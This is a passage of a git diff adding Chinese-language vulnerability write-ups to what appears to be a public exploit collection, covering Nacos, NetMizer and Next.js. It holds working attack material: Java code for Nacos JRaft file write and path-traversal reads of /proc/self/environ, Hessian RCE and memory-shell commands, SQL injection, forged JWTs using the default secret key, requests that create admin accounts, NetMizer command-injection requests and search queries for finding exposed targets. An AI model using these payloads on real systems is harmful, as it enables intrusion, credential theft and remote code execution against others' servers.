request.append("1.txt".getBytes(), "aaaa\n".getBytes());//向/home/nacos/data/naming/data/1.txt写入aaaa + JacksonSerializer serializer = new JacksonSerializer(); + send(address, serializer.serialize(request)); + } +``` + +## 任意文件读取 
+ +```java +public static void send2(String addr, byte[] payload) throws Exception { + Configuration conf = new Configuration(); + conf.parse(addr); + RouteTable.getInstance().updateConfiguration("nacos", conf); + CliClientServiceImpl cliClientService = new CliClientServiceImpl(); + cliClientService.init(new CliOptions()); + RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk(); + PeerId leader = PeerId.parsePeer(addr); + Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses"); + parserClasses.setAccessible(true); + ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient()); + map.put("com.alibaba.nacos.consistency.entity.ReadRequest", ReadRequest.getDefaultInstance()); + MarshallerHelper.registerRespInstance(ReadRequest.class.getName(), ReadRequest.getDefaultInstance()); + final ReadRequest readRequest = ReadRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).build(); + Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), readRequest, 5000); + System.out.println(o); +} +public static void main(String[] args) throws Exception { + bypass(); + String address = "192.168.3.153:7848"; + + JacksonSerializer serializer = new JacksonSerializer(); + List byteArrayList = Arrays.asList("../../../../../../proc/self/environ".getBytes()); + send2(address, serializer.serialize(byteArrayList)); + + } +``` + +![image-20240827224619150](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408281104726.png) + + + +## 漏洞来源 + +- https://forum.butian.net/article/570 \ No newline at end of file diff --git a/Nacos存在Hessian反序列化漏洞.md b/Nacos存在Hessian反序列化漏洞.md new file mode 100644 index 0000000..9042e66 --- /dev/null +++ b/Nacos存在Hessian反序列化漏洞.md 
@@ -0,0 +1,38 @@ +# Nacos存在 Hessian反序列化漏洞 + +# <font style="color:rgb(51, 51, 51);">一、漏洞简介</font> +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在 Hessian反序列化漏洞</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ fofa `icon_hash="13942501"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/978s9GPtdTqLqp3h/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-011081.png) + +# 四、漏洞复现 +[NacosRce_jar.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/29512878/1730102385394-3297bb1d-0432-46be-b3dd-d879623eb40a.zip) + +执行命令 + +```plain +java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 "whoami" +``` + +![1728962458168-988ba965-1598-420c-ba8b-0f2eae91f733.png](./img/978s9GPtdTqLqp3h/1728962458168-988ba965-1598-420c-ba8b-0f2eae91f733-214348.png) + +打入内存马 + +```plain +java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 memshell +``` + + + + + +> 更新: 2024-10-28 15:59:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ziymxgvn5011of96> \ No newline at end of file diff --git a/Nacos存在SQL注入漏洞.md b/Nacos存在SQL注入漏洞.md new file mode 100644 index 0000000..c343a2f --- /dev/null +++ b/Nacos存在SQL注入漏洞.md 
@@ -0,0 +1,25 @@ +# Nacos存在SQL注入漏洞 + +# 一、漏洞简介 +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在SQL注入漏洞。</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/IkkWO2cBOQAjPiXD/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-961719.png) + +# 四、漏洞复现 +```plain +/nacos/v1/cs/ops/derby?&sql=SELECT%20*FROM%20users +``` + +![1712670022957-e404e760-d7d5-4be8-8e7d-f9838b3c4969.png](./img/IkkWO2cBOQAjPiXD/1712670022957-e404e760-d7d5-4be8-8e7d-f9838b3c4969-489647.png) + + + +> 更新: 2024-10-28 15:59:45 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/orgycyhocbkyn07u> \ No newline at end of file diff --git a/Nacos存在SpringbootActuator未授权漏洞.md b/Nacos存在SpringbootActuator未授权漏洞.md new file mode 100644 index 0000000..3c95b65 --- /dev/null +++ b/Nacos存在SpringbootActuator未授权漏洞.md 
@@ -0,0 +1,35 @@ +# Nacos存在Spring boot Actuator未授权漏洞 + +# 一、漏洞简介 +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在Spring boot Actuator未授权漏洞</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/tCM8yy1R79KWVs-U/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-922909.png) + +# 四、漏洞复现 +```plain +/nacos/actuator/ +``` + +![1723181812776-57f9f2be-fd9e-4eac-9788-48ca8d2386d1.png](./img/tCM8yy1R79KWVs-U/1723181812776-57f9f2be-fd9e-4eac-9788-48ca8d2386d1-338408.png) + +```plain +HEAD /nacos/actuator/heapdump HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +``` + +![1729412390938-c97ffc26-4ec1-4ed4-b87c-0db483ad416f.png](./img/tCM8yy1R79KWVs-U/1729412390938-c97ffc26-4ec1-4ed4-b87c-0db483ad416f-308532.png) + + + +> 更新: 2024-10-28 15:59:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/utanzrai31cospcx> \ No newline at end of file diff --git a/Nacos存在serviceSync未授权访问漏洞.md b/Nacos存在serviceSync未授权访问漏洞.md new file mode 100644 index 0000000..534807a --- /dev/null +++ b/Nacos存在serviceSync未授权访问漏洞.md 
@@ -0,0 +1,32 @@ +# Nacos存在serviceSync未授权访问漏洞 + +# 一、漏洞简介 +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在serviceSync未授权访问漏洞</font> + +# <font style="color:rgb(63, 63, 63);">二、影响版本</font> ++ <font style="color:rgb(63, 63, 63);">Nacos</font> + +# <font style="color:rgb(63, 63, 63);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ fofa`app="NACOS"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/Mx_5qpYTCzuDrSL-/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-620456.png) + +# 四、漏洞复现 +```plain +/nacos/#/serviceSync +``` + +![1729426330695-15a37858-adda-4ca8-adb3-e7c967152baa.png](./img/Mx_5qpYTCzuDrSL-/1729426330695-15a37858-adda-4ca8-adb3-e7c967152baa-997048.png) + +```plain +/v1/task/list?pageSize=10&pageNum=1 +``` + +![1729426719698-3d63c9aa-96bf-421f-a764-e9f7374575f3.png](./img/Mx_5qpYTCzuDrSL-/1729426719698-3d63c9aa-96bf-421f-a764-e9f7374575f3-797790.png) + + + +> 更新: 2024-10-28 15:59:45 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yx9zlsgguyq1p5v5> \ No newline at end of file diff --git a/Nacos存在未授权下载配置信息漏洞.md b/Nacos存在未授权下载配置信息漏洞.md new file mode 100644 index 0000000..223ef5f --- /dev/null +++ b/Nacos存在未授权下载配置信息漏洞.md 
@@ -0,0 +1,35 @@ +# Nacos存在未授权下载配置信息漏洞 + +一、漏洞简介 + +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在未授权下载配置信息漏洞 </font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ fofa `icon_hash="13942501"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/RWufMeRanf6G5Rfy/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-533247.png) + +# 四、漏洞复现 +```plain +GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1 +Host: +If-Modified-Since: Wed, 03 Apr 2024 06:25:07 GMT +Priority: u=0, i +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +``` + +![1727070243107-46f80892-97ca-4e7c-a545-a85b1ea42e60.png](./img/RWufMeRanf6G5Rfy/1727070243107-46f80892-97ca-4e7c-a545-a85b1ea42e60-575442.png)![1727070251522-dba0dbcc-9311-4c06-954c-8b1fff3951a7.png](./img/RWufMeRanf6G5Rfy/1727070251522-dba0dbcc-9311-4c06-954c-8b1fff3951a7-884665.png) + + + +> 更新: 2024-10-28 15:59:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ssg3fe6cnv42gbrw> \ No newline at end of file diff --git a/Nacos存在版本信息泄露.md b/Nacos存在版本信息泄露.md new file mode 100644 index 0000000..1aa263b --- /dev/null +++ b/Nacos存在版本信息泄露.md 
@@ -0,0 +1,26 @@ +# Nacos存在版本信息泄露 + +# <font style="color:rgb(51, 51, 51);">一、漏洞简介</font> +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在版本信息泄露</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ fofa `icon_hash="13942501"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/6t6u-HEvLLK-dJHp/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-025218.png) + +# 四、漏洞复现 +```plain +/nacos/v1/console/server/state +``` + +![1728962718996-fc330c21-16a7-4e90-9a36-48fe7096d9cb.png](./img/6t6u-HEvLLK-dJHp/1728962718996-fc330c21-16a7-4e90-9a36-48fe7096d9cb-916941.png) + + + +> 更新: 2024-10-28 15:59:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uvzl7c4yx4hiuq9k> \ No newline at end of file diff --git a/Nacos存在默认口令漏洞.md b/Nacos存在默认口令漏洞.md new file mode 100644 index 0000000..0b3b7dc --- /dev/null +++ b/Nacos存在默认口令漏洞.md 
@@ -0,0 +1,25 @@ +# Nacos存在默认口令漏洞 + +# 一、漏洞简介 +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在默认口令漏洞。</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/-rSL8iMmnJh02-2S/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-132632.png) + +# 四、漏洞复现 +```plain +nacos/nacos +``` + +![1706100637966-94b887f6-0514-4248-ae6a-37c5dae60015.png](./img/-rSL8iMmnJh02-2S/1706100637966-94b887f6-0514-4248-ae6a-37c5dae60015-323211.png) + + + +> 更新: 2024-10-28 15:59:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sfeezle5mv21kuf2> \ No newline at end of file diff --git a/Nacos未授权下载配置信息.md b/Nacos未授权下载配置信息.md new file mode 100644 index 0000000..a796309 --- /dev/null +++ b/Nacos未授权下载配置信息.md @@ -0,0 +1,18 @@ +# Nacos未授权下载配置信息 + +Nacos未授权下载配置信息 + +## fofa + +```javascript +icon_hash="13942501" +``` + +## poc + +```java +GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1 +Host: +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191401675.png) \ No newline at end of file diff --git a/Nacos未授权访问漏洞(CVE-2021-29441).md b/Nacos未授权访问漏洞(CVE-2021-29441).md new file mode 100644 index 0000000..5f84da1 --- /dev/null +++ b/Nacos未授权访问漏洞(CVE-2021-29441).md 
@@ -0,0 +1,77 @@ +# Nacos未授权访问漏洞(CVE-2021-29441) + +# 一、漏洞简介 +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。</font> + +# <font style="color:rgb(63, 63, 63);">二、影响版本</font> ++ <font style="color:rgb(63, 63, 63);">Nacos <= 2.0.0-ALPHA.1</font> + +# <font style="color:rgb(63, 63, 63);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/MraeKPVNc9lFkzMT/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-600623.png) + +# 四、漏洞复现 +poc + +```plain +GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1 +User-Agent: Nacos-Server +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Cache-Control: no-cache +Pragma: no-cache +Host: +``` + +![1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48.png](./img/MraeKPVNc9lFkzMT/1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48-585785.png) + +通过未授权访问漏洞添加账号 + +```plain +POST /nacos/v1/auth/users HTTP/1.1 +Host: +User-Agent: Nacos-Server +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Pragma: no-cache +Cache-Control: no-cache +Content-Type: application/x-www-form-urlencoded +Content-Length: 27 + +username=test&password=test +``` + 
+![1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6.png](./img/MraeKPVNc9lFkzMT/1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6-376550.png) + +查看是否添加成功 + +```plain +GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1 +User-Agent: Nacos-Server +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Cache-Control: no-cache +Pragma: no-cache +Host: +``` + +![1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839.png](./img/MraeKPVNc9lFkzMT/1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839-049495.png) + +使用添加的账号登录 + +![1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d.png](./img/MraeKPVNc9lFkzMT/1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d-182574.png) + + + +> 更新: 2024-10-28 15:59:45 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gygvcmtv1bh6n6za> \ No newline at end of file diff --git a/Nacos默认key导致权限绕过登陆漏洞.md b/Nacos默认key导致权限绕过登陆漏洞.md new file mode 100644 index 0000000..bbe9e26 --- /dev/null +++ b/Nacos默认key导致权限绕过登陆漏洞.md 
@@ -0,0 +1,66 @@ +# Nacos默认key导致权限绕过登陆漏洞 + +# 一、漏洞简介 +<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。</font><font style="color:rgba(0, 0, 0, 0.9);">Nacos中发现影响Nacos <= 2.1.0的问题,</font><font style="color:rgb(51, 51, 51);">nacos在默认情况下未对token.secret.key进行修改,导致攻击者可以绕过密钥认证进入后台。</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgba(0, 0, 0, 0.9);">0.1.0 <= Nacos <= 2.2.0</font> + +# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font> ++ hunter`app.name="Nacos"` ++ 特征 + +![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/LOnCocDcUxyM3hX0/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-478295.png) + +# 四、漏洞复现 +1. <font style="color:rgb(51, 51, 51);">Nacos的token.secret.key值是固定死的</font> + +```plain +nacos/conf/application.properties //位于该文件中 + +SecretKey012345678901234567890123456789012345678901234567890123456789 +``` + +2. 构造JWT + +![1706099878073-f9c28eee-f92e-45b8-a9b6-91a32ac4d665.png](./img/LOnCocDcUxyM3hX0/1706099878073-f9c28eee-f92e-45b8-a9b6-91a32ac4d665-712417.png) + +3. <font style="color:rgb(51, 51, 51);">构造数据包获取accesstoken</font> + +```plain +POST /nacos/v1/auth/users/login HTTP/1.1 +Host: +Content-Length: 28 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6NDA3MDk1MzY0M30.XPfd1WnNHqQdu5-D734ishsizYCEbsQG7mVwdm4MyWg +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +username=nacos&password=1111 +``` + +![1706099933954-9f0cd917-8496-4902-85be-b27384144f06.png](./img/LOnCocDcUxyM3hX0/1706099933954-9f0cd917-8496-4902-85be-b27384144f06-367564.png) + +4. 
登录系统 + +<font style="color:rgb(51, 51, 51);">将返回包内容全部复制,然后在登陆时抓包,拦截返回包替换,然后发包即可登录后台</font> + +<font style="color:rgb(51, 51, 51);">在账号密码错误的情况下返回包为403</font> + +![1706100054649-9f5b4daa-8e47-417b-9bc2-066fa69a952c.png](./img/LOnCocDcUxyM3hX0/1706100054649-9f5b4daa-8e47-417b-9bc2-066fa69a952c-448988.png) + +<font style="color:rgb(51, 51, 51);">将拦截的返回包替换为之前的返回包内容</font> + +![1706100091608-5358f465-fbf8-4d00-a8c0-495b4b9da471.png](./img/LOnCocDcUxyM3hX0/1706100091608-5358f465-fbf8-4d00-a8c0-495b4b9da471-231976.png) + +<font style="color:rgb(51, 51, 51);">发包之后成功登录后台</font> + +![1706100115758-2cc1be63-70c6-4198-8c44-bf6fc2e8d617.png](./img/LOnCocDcUxyM3hX0/1706100115758-2cc1be63-70c6-4198-8c44-bf6fc2e8d617-715031.png) + + + +> 更新: 2024-10-28 15:59:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pg7g9r320fwlmxap> \ No newline at end of file diff --git a/NetMizer日志管理系统cmd存在命令执漏洞.md b/NetMizer日志管理系统cmd存在命令执漏洞.md new file mode 100644 index 0000000..8e71c58 --- /dev/null +++ b/NetMizer日志管理系统cmd存在命令执漏洞.md 
@@ -0,0 +1,33 @@ +# NetMizer 日志管理系统cmd存在命令执漏洞 + +### 一、漏洞描述 +NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行 + +### 二、影响版本 +<font style="color:#000000;">NetMizer</font> + +### 三、资产测绘 +```plain +title="NetMizer 日志管理系统" +``` + +![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/2_8as_pka3_kmJuE/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-579033.png) + +### 四、漏洞复现 +```plain +GET /data/manage/cmd.php?cmd=id HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1720677875524-4205a312-6ae1-42a1-b263-bfa5aedcc9f1.png](./img/2_8as_pka3_kmJuE/1720677875524-4205a312-6ae1-42a1-b263-bfa5aedcc9f1-955410.png) + + + +> 更新: 2024-08-12 17:48:54 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hi1upuiio8gsogz8> \ No newline at end of file diff --git a/NetMizer日志管理系统存在前台RCE漏洞.md b/NetMizer日志管理系统存在前台RCE漏洞.md new file mode 100644 index 0000000..df8a0ea --- /dev/null +++ b/NetMizer日志管理系统存在前台RCE漏洞.md 
@@ -0,0 +1,39 @@ +# NetMizer 日志管理系统存在前台RCE漏洞 + +### 一、漏洞描述 +NetMizer 日志管理系统position.php、接口处存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,写入后门,获取服务器权限,进而控制整个web服务器。 + +### 二、影响版本 +<font style="color:#000000;">NetMizer</font> + +### 三、资产测绘 +```plain +title="NetMizer 日志管理系统" +``` + +![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/pcBac11H3i8YpRlr/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-738320.png) + +### 四、漏洞复现 +```plain +GET /data/search/position.php?action=file&nodeid=|id%3E1.txt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1720677595198-3656affb-0930-41f2-8854-b61e681505a3.png](./img/pcBac11H3i8YpRlr/1720677595198-3656affb-0930-41f2-8854-b61e681505a3-704021.png) + +```plain +/data/search/1.txt +``` + +![1720677700435-c746a0b6-51d4-47fc-921f-3cd022ba8826.png](./img/pcBac11H3i8YpRlr/1720677700435-c746a0b6-51d4-47fc-921f-3cd022ba8826-191347.png) + + + +> 更新: 2024-08-12 17:48:54 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uwvvawaszmhd1b0w> \ No newline at end of file diff --git a/NetMizer日志管理系统存在目录遍历漏洞.md b/NetMizer日志管理系统存在目录遍历漏洞.md new file mode 100644 index 0000000..1eb0c22 --- /dev/null +++ b/NetMizer日志管理系统存在目录遍历漏洞.md 
@@ -0,0 +1,26 @@ +# NetMizer 日志管理系统存在目录遍历漏洞 + +### 一、漏洞描述 +北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。 + +### 二、影响版本 +<font style="color:#000000;">NetMizer</font> + +### 三、资产测绘 +```plain +title="NetMizer 日志管理系统" +``` + +![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/zxlV67svFt2h_jMb/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-684031.png) + +### 四、漏洞复现 +```plain +/data/ +``` + +![1720677771307-280e5029-0775-4c52-8e1a-8693bac733c3.png](./img/zxlV67svFt2h_jMb/1720677771307-280e5029-0775-4c52-8e1a-8693bac733c3-722431.png) + + + +> 更新: 2024-08-12 17:48:54 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hqxda6dxd5064rpt> \ No newline at end of file diff --git a/NetMizer日志管理系统登录绕过漏洞.md b/NetMizer日志管理系统登录绕过漏洞.md new file mode 100644 index 0000000..6884942 --- /dev/null +++ b/NetMizer日志管理系统登录绕过漏洞.md @@ -0,0 +1,34 @@ +# NetMizer 日志管理系统登录绕过漏洞 + +### 一、漏洞描述 +NetMizer 日志管理系统存在登录绕过漏洞,通过限制某个请求包的发送获取后台权限 + +### 二、影响版本 +<font style="color:#000000;">NetMizer</font> + +### 三、资产测绘 +```plain +title="NetMizer 日志管理系统" +``` + +![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/PwoyZhBf6v8Nrgv0/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-032975.png) + +### 四、漏洞复现 +访问页面 main.html 并抓取请求包 + +```plain +/main.html +``` + +, Drop掉下面对请求包 + +![1720678035409-58d4a71b-02b3-455b-a0f1-df42bac53387.png](./img/PwoyZhBf6v8Nrgv0/1720678035409-58d4a71b-02b3-455b-a0f1-df42bac53387-098409.png) + +直接进入后台 + +![1720678013546-1e4e9e3c-d746-4cba-b47f-757b6426e65a.png](./img/PwoyZhBf6v8Nrgv0/1720678013546-1e4e9e3c-d746-4cba-b47f-757b6426e65a-723156.png) + + + +> 更新: 2024-08-12 17:48:53 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hgzz1oo7add2wvv4> \ No newline at end of file diff --git a/Next.js权限绕过(CVE-2024-51479).md b/Next.js权限绕过(CVE-2024-51479).md new file mode 100644 index 0000000..a16e670 --- /dev/null +++ b/Next.js权限绕过(CVE-2024-51479).md 
@@ -0,0 +1,20 @@ +# Next.js权限绕过(CVE-2024-51479) + +Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。在受影响的版本中,如果 Next.js 应用程序正在基于路径名的中间件中执行授权,则可能会绕过应用程序根目录下的页面的此授权,允许未经授权访问Next.js应用程序中的根级页面,这些页面本应受到授权检查的保护 + +## fofa +```javascript +app="NEXT.JS" +``` + +## poc +```javascript +/admin?__nextLocale=111 +/admin/users?__nextLocale=anything +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041404258.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/rPBKzvNI9wc79tDr2KC5sA \ No newline at end of file diff --git a/NextGenMirthConnectXStream存在反序列化远程代码执行漏洞.md b/NextGenMirthConnectXStream存在反序列化远程代码执行漏洞.md new file mode 100644 index 0000000..214eeff --- /dev/null +++ b/NextGenMirthConnectXStream存在反序列化远程代码执行漏洞.md 
